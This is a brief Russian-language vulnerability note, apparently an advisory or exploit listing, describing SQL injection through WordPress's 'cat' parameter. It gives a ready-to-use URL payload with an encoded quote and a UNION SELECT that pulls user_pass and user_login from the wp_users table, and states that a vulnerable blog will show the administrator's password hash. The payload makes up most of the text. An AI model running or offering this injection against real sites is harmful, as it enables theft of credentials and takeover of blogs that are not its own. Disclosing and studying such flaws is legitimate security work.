Описание:
Уязвимость поезволяет внедрить SQL команды и раскрыть данные БД.
Пример:
http://path/to/wordpress/index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*
Если ваша версия уязвима, то адаптированный пример, должен выдать в броузер хэш пароля администратора блога (CMS).